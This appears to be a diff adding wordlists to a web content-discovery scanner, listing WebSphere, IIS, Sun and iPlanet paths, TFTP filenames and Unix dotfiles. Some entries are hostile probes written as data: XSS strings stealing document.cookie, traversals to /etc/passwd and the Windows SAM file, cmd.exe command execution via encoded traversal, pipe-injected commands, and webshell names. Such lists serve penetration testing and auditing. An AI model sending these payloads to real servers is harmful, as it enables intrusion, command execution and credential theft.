AddressBookW2JE/*.jsv
|
||||
AddressBookW2JE/*.jsw
|
||||
AddressBookW2JE/services/AddressBook
|
||||
AddressBookW2JE/services/AddressBook/wsdl/*
|
||||
AlbumCatalogWeb
|
||||
AlbumCatalogWeb/*
|
||||
AlbumCatalogWeb/docs/*
|
||||
AlbumCatalogWeb/docsservlet
|
||||
AlbumCatalogWeb/docsservlet/*
|
||||
AlbumCatalogWebservlet
|
||||
AlbumCatalogWebservlet/*
|
||||
AppInstallStatusServlet
|
||||
AppManagementStatus
|
||||
AppServer
|
||||
ApplicationProfileSample
|
||||
ApplicationProfileSample/*
|
||||
ApplicationProfileSample/docs/*
|
||||
ApplicationProfileSampleservlet
|
||||
ApplicationProfileSampleservlet/*
|
||||
BBApp
|
||||
Bank/*.jsp
|
||||
Bank/*.jsv
|
||||
Bank/*.jsw
|
||||
Bank/services/Transfer_SEI
|
||||
Bank/services/Transfer_SEI/wsdl
|
||||
Bank/services/Transfer_SEI/wsdl/*
|
||||
BeenThere
|
||||
ClusterRollout
|
||||
ControllerServlet
|
||||
DynaCacheESI
|
||||
DynaCacheESI/esiInavlidator
|
||||
DynamicQuery/EmployeeFinder
|
||||
DynamicQuery/EmployeeFinder/*
|
||||
DynamicQuery/docs/*
|
||||
ErrorReporter
|
||||
ErrorServlet
|
||||
FileTransfer
|
||||
GalleryMenu
|
||||
Greenhouse
|
||||
Greenhouse/*
|
||||
GreenhouseByWebSphere/docs/*
|
||||
GreenhouseEJB/*.jsp
|
||||
GreenhouseEJB/*.jsv
|
||||
GreenhouseEJB/*.jsw
|
||||
GreenhouseEJB/services/GreenhouseFront
|
||||
GreenhouseEJB/services/GreenhouseFront/wsdl/*
|
||||
GreenhouseWeb
|
||||
GreenhouseWeb/*
|
||||
GreenhouseWebservlet
|
||||
GreenhouseWebservlet/*
|
||||
Greenhouseservlet
|
||||
Greenhouseservlet/*
|
||||
HelloHTML.jsp
|
||||
HelloHTMLError.jsp
|
||||
HelloPervasive
|
||||
HelloVXML.jsp
|
||||
HelloVXMLError.jsp
|
||||
HelloWML.jsp
|
||||
HelloWMLError.jsp
|
||||
HelloWorld
|
||||
HelloWorldServlet
|
||||
HitCount
|
||||
HitCount.jsp
|
||||
IBMDefaultErrorReporter
|
||||
IBMWebAS
|
||||
JTAExtensionsSamples/TransactionTracker
|
||||
JTAExtensionsSamples/TransactionTracker/*
|
||||
JTAExtensionsSamples/docs/*
|
||||
MANIFEST.MF
|
||||
META-INF
|
||||
MessageDrivenBeans/docs/*
|
||||
MessageDrivenBeans/docsservlet/*
|
||||
OrderProcessorEJB/*
|
||||
OrderProcessorEJB/*.jsp
|
||||
OrderProcessorEJB/*.jsv
|
||||
OrderProcessorEJB/*.jsw
|
||||
OrderProcessorEJB/services/FrontGate
|
||||
OrderProcessorEJB/services/FrontGate/wsdl/*
|
||||
PlantsByWebSphere
|
||||
PlantsByWebSphere/*
|
||||
PlantsByWebSphere/docs
|
||||
SamplesGallery
|
||||
SamplesGallery/*
|
||||
SimpleServlet
|
||||
SnoopServlet
|
||||
SourceCodeViewer
|
||||
Sourceservlet-classViewer
|
||||
StockQuote/*.jsp
|
||||
StockQuote/*.jsv
|
||||
StockQuote/*.jsw
|
||||
StockQuote/services/xmltoday-delayed-quotes
|
||||
StockQuote/services/xmltoday-delayed-quotes/wsdl/*
|
||||
TechnologySamples/AddressBook
|
||||
TechnologySamples/AddressBook/*
|
||||
TechnologySamples/AddressBook/*.jsp
|
||||
TechnologySamples/AddressBook/*.jsv
|
||||
TechnologySamples/AddressBook/*.jsw
|
||||
TechnologySamples/AddressBook/AddressBookServlet
|
||||
TechnologySamples/AddressBook/servlet/*
|
||||
TechnologySamples/BasicCalculator
|
||||
TechnologySamples/BasicCalculator/*
|
||||
TechnologySamples/BulletinBoard
|
||||
TechnologySamples/BulletinBoard/*
|
||||
TechnologySamples/BulletinBoardservlet
|
||||
TechnologySamples/BulletinBoardservlet/*
|
||||
TechnologySamples/Calendar
|
||||
TechnologySamples/Calendar/*
|
||||
TechnologySamples/FilterServlet
|
||||
TechnologySamples/FilterServlet/*
|
||||
TechnologySamples/FormLogin
|
||||
TechnologySamples/FormLogin/*
|
||||
TechnologySamples/FormLoginservlet
|
||||
TechnologySamples/FormLoginservlet/*
|
||||
TechnologySamples/JAASLogin
|
||||
TechnologySamples/JAASLogin/*
|
||||
TechnologySamples/JAASLoginservlet
|
||||
TechnologySamples/JAASLoginservlet/*
|
||||
TechnologySamples/MovieReview
|
||||
TechnologySamples/MovieReview/*
|
||||
TechnologySamples/MovieReview2_0
|
||||
TechnologySamples/MovieReview2_0/*
|
||||
TechnologySamples/MovieReview2_1
|
||||
TechnologySamples/MovieReview2_1/*
|
||||
TechnologySamples/PageReturner
|
||||
TechnologySamples/PageReturner/*
|
||||
TechnologySamples/PageReturnerservlet
|
||||
TechnologySamples/PageReturnerservlet/*
|
||||
TechnologySamples/ReadingList
|
||||
TechnologySamples/ReadingList/*
|
||||
TechnologySamples/SimpleJSP
|
||||
TechnologySamples/SimpleJSP/*
|
||||
TechnologySamples/SimpleServlet
|
||||
TechnologySamples/SimpleServlet/*
|
||||
TechnologySamples/Subscription
|
||||
TechnologySamples/Subscription/*
|
||||
TechnologySamples/Subscriptionservlet
|
||||
TechnologySamples/Subscriptionservlet/*
|
||||
TechnologySamples/Taglib
|
||||
TechnologySamples/Taglib/*
|
||||
TechnologySamples/docs
|
||||
WEB-INF
|
||||
WEB-INF./web.xml
|
||||
WEB-INF/web.xml
|
||||
WSsamples
|
||||
WSsamples/*
|
||||
WSsamples/de
|
||||
WSsamples/de/*
|
||||
WSsamples/en
|
||||
WSsamples/en/*
|
||||
WSsamples/es
|
||||
WSsamples/es/*
|
||||
WSsamples/fr
|
||||
WSsamples/fr/*
|
||||
WSsamples/index.jsp
|
||||
WSsamples/it
|
||||
WSsamples/it/*
|
||||
WSsamples/ja
|
||||
WSsamples/ja/*
|
||||
WSsamples/ko
|
||||
WSsamples/ko/*
|
||||
WSsamples/pt_br
|
||||
WSsamples/pt_br/*
|
||||
WSsamples/zh_cn
|
||||
WSsamples/zh_cn/*
|
||||
WSsamples/zh_tw
|
||||
WSsamples/zh_tw/*
|
||||
WarehouseEJB/*.jsp
|
||||
WarehouseEJB/*.jsv
|
||||
WarehouseEJB/*.jsw
|
||||
WarehouseEJB/services/WarehouseFront
|
||||
WarehouseEJB/services/WarehouseFront/wsdl/*
|
||||
WarehouseWeb
|
||||
WarehouseWeb/*
|
||||
WarehouseWebservlet
|
||||
WarehouseWebservlet/*
|
||||
WebServicesSamples/docs/*
|
||||
WebSphere
|
||||
WebSphereBank
|
||||
WebSphereBank/*
|
||||
WebSphereBank/docs/*
|
||||
WebSphereBankDeposit
|
||||
WebSphereBankDeposit/*
|
||||
WebSphereBankDepositservlet
|
||||
WebSphereBankDepositservlet/*
|
||||
WebSphereBankservlet
|
||||
WebSphereBankservlet/*
|
||||
WebSphereSamples
|
||||
WebSphereSamples.Configuration.config
|
||||
WebSphereSamples/
|
||||
WebSphereSamples/SingleSamples/AccountAndTransfer/create.html
|
||||
WebSphereSamples/SingleSamples/Increment/increment.html
|
||||
WebSphereSamples/YourCo/main.html
|
||||
_DynaCacheEsi
|
||||
_DynaCacheEsi/*
|
||||
_DynaCacheEsi/esiInvalidator
|
||||
ab/*
|
||||
ab/docs/*
|
||||
activitysessions/docs/*
|
||||
addNodeListener
|
||||
admin
|
||||
admin-authz.xml
|
||||
admin.conf
|
||||
admin.passwd
|
||||
admin/*
|
||||
admin/logon.jsp
|
||||
admin/secure/logon.jsp
|
||||
apadminred
|
||||
apadminred.html
|
||||
aphtpasswd.html
|
||||
asynchbeans/*
|
||||
asynchbeans/docs/*
|
||||
cachemonitor
|
||||
cachemonitor/statistics.jsp
|
||||
cell.xml
|
||||
cells
|
||||
cgi-bin
|
||||
cgi-bin/
|
||||
com.ibm.ws.console.events
|
||||
com.ibm.ws.console.events/runtime_messages.jsp
|
||||
config
|
||||
console
|
||||
debug_error.jsp
|
||||
error
|
||||
error.jsp
|
||||
esiInavlidator
|
||||
estore
|
||||
estore/annotated-index.html
|
||||
estore/index.html
|
||||
estore/populate
|
||||
examples
|
||||
hello
|
||||
helloEJB
|
||||
hitcount
|
||||
httpd.conf
|
||||
i18nctxSample
|
||||
i18nctxSample/*
|
||||
i18nctxSample/docs/*
|
||||
ibm
|
||||
ibm/console
|
||||
ibm_security_logout
|
||||
icons
|
||||
images
|
||||
index.html
|
||||
index.jsp
|
||||
ivt
|
||||
ivt/*
|
||||
ivt/ivtDate.jsp
|
||||
ivt/ivtejb
|
||||
ivt/ivtservler
|
||||
ivt/ivtservlet
|
||||
ivtejb
|
||||
ivtserver
|
||||
ivtservlet
|
||||
j_security_check
|
||||
jsp
|
||||
login.html
|
||||
manual
|
||||
manual/index.html
|
||||
node.xml
|
||||
nodes
|
||||
opc/*.jsp
|
||||
opc/*.jsv
|
||||
opc/*.jsw
|
||||
opc/services/BrokerServiceIntfPort
|
||||
opc/services/BrokerServiceIntfPort/wsdl/*
|
||||
opc/services/OrderTrackingIntfPort
|
||||
opc/services/OrderTrackingIntfPort/wsdl/*
|
||||
opc/services/PurchaseOrderIntfPort
|
||||
opc/services/PurchaseOrderIntfPort/wsdl/*
|
||||
opt
|
||||
petstore
|
||||
petstore/*
|
||||
ping
|
||||
removeNodeListener
|
||||
resources.xml
|
||||
runtime_messages.jsp
|
||||
samples/activitysessions
|
||||
samples/activitysessions/*
|
||||
scheduler
|
||||
scheduler/*
|
||||
scheduler/docs/*
|
||||
scripts
|
||||
secure/downloadFile/*
|
||||
securecleanup
|
||||
security.xml
|
||||
server-info
|
||||
server-status
|
||||
server.xml
|
||||
serverindex.xml
|
||||
servers
|
||||
servlet
|
||||
servlet/*
|
||||
servlet/ControllerServlet
|
||||
servlet/ErrorReporter
|
||||
servlet/HelloWorldServlet
|
||||
servlet/HitCount
|
||||
servlet/SimpleServlet
|
||||
servlet/SnoopServlet
|
||||
servlet/TheExpiringHTMLServlet
|
||||
servlet/WebSphereSamples.Configuration.config
|
||||
servlet/WebSphereSamples.Form.FormServlet
|
||||
servlet/WebSphereSamples.YourCo.News.NewsServlet
|
||||
servlet/aphtpassword
|
||||
servlet/com.ibm.as400ad.webfacing.runtime.httpcontroller.ControllerServlet
|
||||
servlet/com.ibm.servlet.engine.webapp.DefaultErrorReporter
|
||||
servlet/com.ibm.servlet.engine.webapp.InvokerServlet
|
||||
servlet/com.ibm.servlet.engine.webapp.SimpleFileServlet
|
||||
servlet/com.ibm.servlet.engine.webapp.UncaughtServletException
|
||||
servlet/com.ibm.servlet.engine.webapp.WebAppErrorReport
|
||||
servlet/hello
|
||||
servlet/snoop
|
||||
servlet/snoop2
|
||||
servletcache
|
||||
showCfg
|
||||
sibstatus
|
||||
simple.jsp
|
||||
simpleJSP
|
||||
snoop
|
||||
snoop/*
|
||||
snoop2
|
||||
statistics.jsp
|
||||
status
|
||||
statuspoll
|
||||
theme
|
||||
tradetheme
|
||||
transfer
|
||||
uddigui/*
|
||||
uddisoap/*
|
||||
variables.xml
|
||||
very_simple.jsp
|
||||
virtualhosts.xml
|
||||
wasPerfTool
|
||||
wasPerfTool/*
|
||||
wasPerfToolservlet
|
||||
wasPerfToolservlet/*
|
||||
web.xml
|
||||
webapp
|
||||
webapp/examples/ErrorServlet
|
||||
webapp/examples/HelloPervasive
|
||||
webapp/examples/HitCount
|
||||
webapp/examples/SourceCodeViewer
|
||||
webapp/examples/login.html
|
||||
webapp/examples/ping
|
||||
webapp/examples/showCfg
|
||||
webapp/examples/showcfg
|
||||
webapp/examples/simple.jsp
|
||||
webapp/examples/verify
|
||||
webexec
|
||||
workarea/*
|
||||
workarea/docs/*
|
||||
|
5
discovery/generic/php-common-backdoors.txt
Normal file
5
discovery/generic/php-common-backdoors.txt
Normal file
|
@ -0,0 +1,5 @@
|
|||
c99.php
|
||||
c99shell.php
|
||||
r57.php
|
||||
r58.php
|
||||
dra.php
|
79
discovery/generic/tftp.txt
Normal file
79
discovery/generic/tftp.txt
Normal file
|
@ -0,0 +1,79 @@
|
|||
# files commonly transmitted via tftp
|
||||
000000000000.cfg
|
||||
000000000000-directory~.xml
|
||||
323tosip1_1.bin
|
||||
4601_02_readme_R2_3.txt
|
||||
4601dbte1_82.bin
|
||||
4602_02SWSIPreadme_R1_1.txt
|
||||
4602dbte1_82.bin
|
||||
4602sbte1_82.bin
|
||||
4610_20_readme_R2_3.txt
|
||||
4610_20_readme_SIP_R2_2.txt
|
||||
4624_12_06readme_1_8_3.txt
|
||||
4625_readme_2_5.txt
|
||||
4690_010707.bin
|
||||
4690_readme_1_7_7.txt
|
||||
46xxreadme_111405.txt
|
||||
46xxsettings.txt
|
||||
46xxupgrade.scr
|
||||
a01d01b2_3.bin
|
||||
a02d01b2_3.bin
|
||||
a10d01b2_3.bin
|
||||
a20d01a2_3.bin
|
||||
a20d01b2_3.bin
|
||||
a25d01a2_5.bin
|
||||
b01d01b2_3.bin
|
||||
b02d01b2_3.bin
|
||||
b10d01b2_3.bin
|
||||
b20d01a2_3.bin
|
||||
b20d01b2_3.bin
|
||||
b25d01a2_5.bin
|
||||
bbla0_83.bin
|
||||
bootrom.ld
|
||||
cisco_util
|
||||
CP7912010301SIP050608A.sbin
|
||||
cvt01_2_3.bin
|
||||
cvt02_2_3.bin
|
||||
cvt02sw_2_3.bin
|
||||
def06r1_8_3.bin
|
||||
def24r1_8_3.bin
|
||||
dialplan.xml
|
||||
gkdefault.cfg
|
||||
infrared.txt
|
||||
merlin2.pcm
|
||||
OS79XX.TXT
|
||||
P003-07-5-00.bin
|
||||
P003-07-5-00.sbn
|
||||
P0S3-07-5-00.bin
|
||||
P0S3-07-5-00.loads
|
||||
P0S3-07-5-00.sb2
|
||||
phbook00e011010455.txt
|
||||
phone1.cfg
|
||||
release.xml
|
||||
RINGLIST.DAT
|
||||
s10d01b2_2.bin
|
||||
s20d01b2_2.bin
|
||||
SEP000F34118045.cnf
|
||||
SEP001562EA69E8.cnf
|
||||
SEPDefault.cnf
|
||||
SIP000F34118045.cnf
|
||||
SIPinsertMAChere.cnf
|
||||
SIPinsertMAChere.cnf
|
||||
sip_4602ap1_1.ebin
|
||||
sip_4602bt1_1.ebin
|
||||
sip_4602D01A.txt
|
||||
sip_4602D02A.txt
|
||||
sip.cfg
|
||||
SIPDefault.cnf
|
||||
sip.ld
|
||||
sipto323_1_1.ebin
|
||||
sip.ver
|
||||
SoundPointIPLocalization
|
||||
SoundPointIPWelcome.wav
|
||||
syncinfo.xml
|
||||
test
|
||||
test.txt
|
||||
uip200_463enc.pac
|
||||
uniden00e011030397.txt
|
||||
unidencom.txt
|
||||
XMLDefault.cnf.xml
|
51
discovery/unix/interesting-files-dotfiles.txt
Normal file
51
discovery/unix/interesting-files-dotfiles.txt
Normal file
|
@ -0,0 +1,51 @@
|
|||
/.DS_Store
|
||||
/.FBCIndex
|
||||
/.access
|
||||
/.addressbook
|
||||
/.bash_history
|
||||
/.bashrc
|
||||
/.cobalt
|
||||
/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
|
||||
/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
|
||||
/.cobalt/sysManage/../admin/.htaccess
|
||||
/.fhp
|
||||
/.forward
|
||||
/.history
|
||||
/.htaccess
|
||||
/.htaccess.old
|
||||
/.htaccess.save
|
||||
/.htaccess~
|
||||
/.htpasswd
|
||||
/.lynx_cookies
|
||||
/.mysql_history
|
||||
/.nsconfig
|
||||
/.nsf/../winnt/win.ini
|
||||
/.passwd
|
||||
/.perf
|
||||
/.pinerc
|
||||
/.plan
|
||||
/.proclog
|
||||
/.procmailrc
|
||||
/.profile
|
||||
/.psql_history
|
||||
/.rhosts
|
||||
/.sh_history
|
||||
/.ssh
|
||||
/.ssh/authorized_keys
|
||||
/.ssh/known_hosts
|
||||
/.www_acl
|
||||
/.wwwacl
|
||||
/.access
|
||||
/.cobalt
|
||||
/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')>
|
||||
/.cobalt/alert/service.cgi?service=<script>alert('XSS')</script>
|
||||
/.fhp
|
||||
/.htaccess
|
||||
/.htaccess.old
|
||||
/.htaccess.save
|
||||
/.htaccess~
|
||||
/.htpasswd
|
||||
/.nsconfig
|
||||
/.passwd
|
||||
/.www_acl
|
||||
/.wwwacl
|
36
discovery/unix/interesting-files-iplanet.txt
Normal file
36
discovery/unix/interesting-files-iplanet.txt
Normal file
|
@ -0,0 +1,36 @@
|
|||
?Publisher
|
||||
?wp-cs-dump
|
||||
?wp-html-rend
|
||||
?wp-start-ver
|
||||
?wp-stop-ver
|
||||
?wp-uncheckout
|
||||
?wp-usr-prop
|
||||
?wp-ver-diff
|
||||
?wp-ver-info
|
||||
?wp-verify-link
|
||||
admin-serv
|
||||
admin-serv/config/admpw
|
||||
admpw
|
||||
agents
|
||||
bin
|
||||
ca
|
||||
ca
|
||||
cgi-bin
|
||||
config
|
||||
dirb_random.cgi
|
||||
dirb_random.jsp
|
||||
dirb_random.shtml
|
||||
docs
|
||||
dsgw
|
||||
help
|
||||
index.html
|
||||
jsp
|
||||
manual
|
||||
mc-icons
|
||||
netshare
|
||||
ns-icons
|
||||
publisher
|
||||
search
|
||||
search-ui
|
||||
servlet
|
||||
servlets
|
51
discovery/unix/interesting-files-sun-app-server.txt
Normal file
51
discovery/unix/interesting-files-sun-app-server.txt
Normal file
|
@ -0,0 +1,51 @@
|
|||
ias-samples
|
||||
ias-samples/index.html
|
||||
index.html
|
||||
cgi-bin
|
||||
cgi-bin/gx.cgi
|
||||
cgi-bin/gx.dll
|
||||
cgi-bin/gx.exe
|
||||
gx
|
||||
gx.cgi
|
||||
gx.exe
|
||||
GXApp
|
||||
GXApp/index.html
|
||||
GXApp/COnlineBank
|
||||
GXApp/COnlineBank/COBLogin.html
|
||||
GXApp/CSample
|
||||
GXApp/CSample/index.html
|
||||
GXApp/images
|
||||
GXApp/OnlineBank
|
||||
GXApp/OnlineBank/OBLogin.html
|
||||
fortune
|
||||
NASApp/fortune/fortune
|
||||
lotery
|
||||
COnlineBank
|
||||
CSample
|
||||
OnlineBank
|
||||
NASApp
|
||||
NASApp/system
|
||||
NASApp/system/ValidationError.jsp
|
||||
NASApp/system/ExceptionThrown.jsp
|
||||
NASApp/system/JSPRunner
|
||||
NASApp/system/JSPRunnerSticky
|
||||
NASApp/system/SessionInvalidator
|
||||
NASApp/system/StaticServlet
|
||||
NASApp/system/WelcomeListServlet
|
||||
NASApp/system/FormAuthServlet
|
||||
NASApp/system/CertAuthServlet
|
||||
NASApp/system/BasicAuthServlet
|
||||
system
|
||||
ValidationError.jsp
|
||||
ExceptionThrown.jsp
|
||||
JSPRunner
|
||||
JSPRunnerSticky
|
||||
SessionInvalidator
|
||||
StaticServlet
|
||||
WelcomeListServlet
|
||||
FormAuthServlet
|
||||
CertAuthServlet
|
||||
BasicAuthServlet
|
||||
com.netscape.server.servlet.jsp.JSPRunner
|
||||
servlet
|
||||
classes
|
6
discovery/win/cgi-HTTP-POST-reqd-microsoft.txt
Normal file
6
discovery/win/cgi-HTTP-POST-reqd-microsoft.txt
Normal file
|
@ -0,0 +1,6 @@
|
|||
_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
|
||||
_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
|
||||
_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals
|
||||
_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals
|
||||
admin/db.php
|
||||
_vti_bin/shtml.dll/_vti_rpc
|
78
discovery/win/cgi-microsoft.txt
Normal file
78
discovery/win/cgi-microsoft.txt
Normal file
|
@ -0,0 +1,78 @@
|
|||
# on windows, cgi dir is usually /scripts /cgi /cgi-bin, but could be named anything.
|
||||
/cart32.exe
|
||||
/get32.exe
|
||||
/visadmin.exe
|
||||
/foxweb.exe
|
||||
/webplus.exe?about
|
||||
/fpsrvadm.exe
|
||||
/MsmMask.exe
|
||||
/cmd.exe?/c+dir
|
||||
/cmd1.exe?/c+dir
|
||||
/post32.exe|dir%20c:\\
|
||||
/cgitest.exe
|
||||
/hpnst.exe?c=p+i=
|
||||
/Pbcgi.exe
|
||||
/testcgi.exe
|
||||
/webfind.exe?keywords=01234567890123456789
|
||||
/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C
|
||||
/test-cgi.exe?<script>alert(document.cookie)</script>
|
||||
/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
|
||||
/mkilog.exe
|
||||
/mkplog.exe
|
||||
/MsmMask.exe?mask=/junk334
|
||||
/MsmMask.exe?mask=/junk334
|
||||
/MsmMask.exe?mask=/junk334
|
||||
/MsmMask.exe?mask=/junk334
|
||||
/MsmMask.exe?mask=/junk334
|
||||
/perl.exe?-v
|
||||
/perl.exe
|
||||
/ppdscgi.exe
|
||||
/c32web.exe/ChangeAdminPassword
|
||||
/windmail.exe
|
||||
/dbmlparser.exe
|
||||
/cgimail.exe
|
||||
/minimal.exe
|
||||
/rguest.exe
|
||||
/visitor.exe
|
||||
/webbbs.exe
|
||||
/wguest.exe
|
||||
//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
|
||||
/cfgwiz.exe
|
||||
/Cgitest.exe
|
||||
/mailform.exe
|
||||
/post16.exe
|
||||
/imagemap.exe
|
||||
/htimage.exe/path/filename?2,2
|
||||
/htimage.exe
|
||||
/Webnews.exe
|
||||
/texis.exe/junk
|
||||
/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
|
||||
/sensepost.exe?/c+dir
|
||||
/testcgi.exe
|
||||
/testcgi.exe?<script>alert(document.cookie)</script>
|
||||
/ion-p.exe?page=c:\winnt\repair\sam
|
||||
/../../../../../../../../../../WINNT/system32/ipconfig.exe
|
||||
/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
|
||||
/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
|
||||
/c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf
|
||||
/foxweb.dll
|
||||
/wconsole.dll
|
||||
/shtml.dll
|
||||
/scripts/slxweb.dll/getfile?type=Library&file=[invalid
|
||||
/filename]
|
||||
/rightfax/fuwww.dll/?
|
||||
/WINDMAIL.EXE?%20-n%20c:\boot.ini%
|
||||
/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\
|
||||
/GW5/GWWEB.EXE
|
||||
/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
|
||||
/GW5/GWWEB.EXE?HELP=bad-request
|
||||
/GWWEB.EXE?HELP=bad-request
|
||||
/echo.bat
|
||||
/echo.bat?&dir+c:\\
|
||||
/hello.bat?&dir+c:\\
|
||||
/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
|
||||
/input2.bat?|dir
|
||||
/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
|
||||
/test-cgi.bat
|
||||
/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
|
||||
/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
|
|
@ -0,0 +1,2 @@
|
|||
# Interesting Microsoft IIS files which require being scanned for with the HTTP POST verb
|
||||
/msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName
|
163
discovery/win/interesting-files-microsoft-iis.txt
Normal file
163
discovery/win/interesting-files-microsoft-iis.txt
Normal file
|
@ -0,0 +1,163 @@
|
|||
# Look at the result codes in the headers - 403 likely mean the dir exists, 404 means not. It takes an ISAPI filter for IIS to return 404's for 403s.
|
||||
/.printer
|
||||
/%NETHOOD%/
|
||||
/<script>alert('XSS')</script>.aspx
|
||||
/AccessPlatform/
|
||||
/AccessPlatform/auth/
|
||||
/AccessPlatform/auth/clientscripts/cookies.js
|
||||
/AccessPlatform/auth/clientscripts/login.js
|
||||
/Exadmin/
|
||||
/ExchWeb/
|
||||
/Exchange/
|
||||
/Microsoft-Server-ActiveSync/
|
||||
/OMA/
|
||||
/OWA/
|
||||
/Public/
|
||||
/_layouts/alllibs.htm
|
||||
/_layouts/settings.htm
|
||||
/_layouts/userinfo.htm
|
||||
/_vti_bin/
|
||||
/_vti_bin/_vti_aut/fp30reg.dll
|
||||
/_vti_pvt/
|
||||
/_WEB_INF/
|
||||
/a%5c.aspx
|
||||
/adovbs.inc
|
||||
/aspnet_files/
|
||||
/certcontrol/
|
||||
/certenroll/
|
||||
/certsrv/
|
||||
/citrix/
|
||||
/citrix/AccessPlatform/auth/
|
||||
/citrix/AccessPlatform/auth/clientscripts/
|
||||
/AccessPlatform/auth/clientscripts/
|
||||
/Citrix//AccessPlatform/auth/clientscripts/cookies.js
|
||||
/Citrix/AccessPlatform/auth/clientscripts/login.js
|
||||
/Citrix/PNAgent/config.xml
|
||||
/exchange/root.asp
|
||||
/forum.asp
|
||||
/forum_arc.asp
|
||||
/forum_professionnel.asp
|
||||
/iisadmin/
|
||||
/iisadmpwd/achg.htr
|
||||
/iisadmpwd/aexp.htr
|
||||
/iisadmpwd/aexp2.htr
|
||||
/iisadmpwd/aexp2b.htr
|
||||
/iisadmpwd/aexp3.htr
|
||||
/iisadmpwd/aexp4.htr
|
||||
/iisadmpwd/aexp4b.htr
|
||||
/iisadmpwd/anot.htr
|
||||
/iisadmpwd/anot3.htr
|
||||
/iiasdmpwd/
|
||||
/iishelp/
|
||||
/iishelp/iis/misc/default.asp
|
||||
/iissamples/
|
||||
/imprimer.asp
|
||||
/includes/adovbs.inc
|
||||
/msadc/
|
||||
/null.htw
|
||||
/pbserver/pbserver.dll
|
||||
/postinfo.html
|
||||
/rubrique.asp
|
||||
/scripts/
|
||||
/scripts/fpcount.exe
|
||||
/scripts/cgimail.exe
|
||||
/scripts/tools/newdsn.exe
|
||||
/scripts/tools/getdrvs.exe
|
||||
/scripts/convert.bas
|
||||
/cgi-bin/htmlscript
|
||||
/scripts/counter.exe
|
||||
/scripts/no-such-file.pl
|
||||
/share/
|
||||
/tsweb/
|
||||
/~/<script>alert('XSS')</script>.asp
|
||||
/~/<script>alert('XSS')</script>.aspx
|
||||
/index.shtml
|
||||
/x.htw
|
||||
/x.ida
|
||||
/x.idq
|
||||
/cgi
|
||||
/scripts/iisadmin/ism.dll?http/dir
|
||||
/scripts/samples/search/webhits.exe
|
||||
/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
|
||||
/_vti_bin/_vti_aut/fp30reg.dll
|
||||
/_vti_bin/_vti_aut/fp30reg.dll?1234=X
|
||||
/_vti_bin/shtml.dll/asdfghjkl
|
||||
/_vti_bin/shtml.exe/qwertyuiop
|
||||
/ajfhasdfgsagfakjhgd
|
||||
/cgi-bin/a1stats/a1disp.cgi
|
||||
/checkapache.html
|
||||
/qwertypoiu.printer
|
||||
/ASPSamp/AdvWorks/equipment/catalog_type.asp
|
||||
/Admin/knowledge/dsmgr/users/GroupManager.asp
|
||||
/Admin/knowledge/dsmgr/users/UserManager.asp
|
||||
/AdvWorks/equipment/catalog_type.asp
|
||||
/CFIDE/Administrator/startstop.html
|
||||
/Mail/smtp/Admin/smadv.asp
|
||||
/SiteServer/Admin
|
||||
/SiteServer/Admin/commerce/foundation/DSN.asp
|
||||
/SiteServer/Admin/commerce/foundation/driver.asp
|
||||
/SiteServer/Admin/knowledge/dsmgr/default.asp
|
||||
/SiteServer/Publishing/viewcode.asp
|
||||
/SiteServer/admin/findvserver.asp
|
||||
/Sites/Knowledge/Membership/Inspired/ViewCode.asp
|
||||
/Sites/Knowledge/Membership/Inspiredtutorial/Viewcode.asp
|
||||
/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
|
||||
/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
|
||||
/Sites/Samples/Knowledge/Push/ViewCode.asp
|
||||
/Sites/Samples/Knowledge/Search/ViewCode.asp
|
||||
/WEB-INF/web.xml
|
||||
/_AuthChangeUrl?
|
||||
/_mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
|
||||
/_mem_bin/autoconfig.asp
|
||||
/_mem_bin/formslogin.asp
|
||||
/_vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
|
||||
/_vti_bin/_vti_aut/dvwssr.dll
|
||||
/_vti_bin/fpcount.exe?Page=default.asp|Image=3
|
||||
/_vti_bin/shtml.dll
|
||||
/_vti_pvt/administrator.pwd
|
||||
/_vti_pvt/administrators.pwd
|
||||
/_vti_pvt/authors.pwd
|
||||
/_vti_pvt/service.pwd
|
||||
/_vti_pvt/shtml.exe
|
||||
/_vti_pvt/users.pwd
|
||||
/cfide/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
|
||||
/cgi-bin/htimage.exe?2,2
|
||||
/cgi-bin/imagemap.exe?2,2
|
||||
/clocktower
|
||||
/domcfg.nsf/?open
|
||||
/iisadmpwd/achg.htr
|
||||
/iisadmpwd/aexp.htr
|
||||
/iisadmpwd/aexp2.htr
|
||||
/iisadmpwd/aexp2b.htr
|
||||
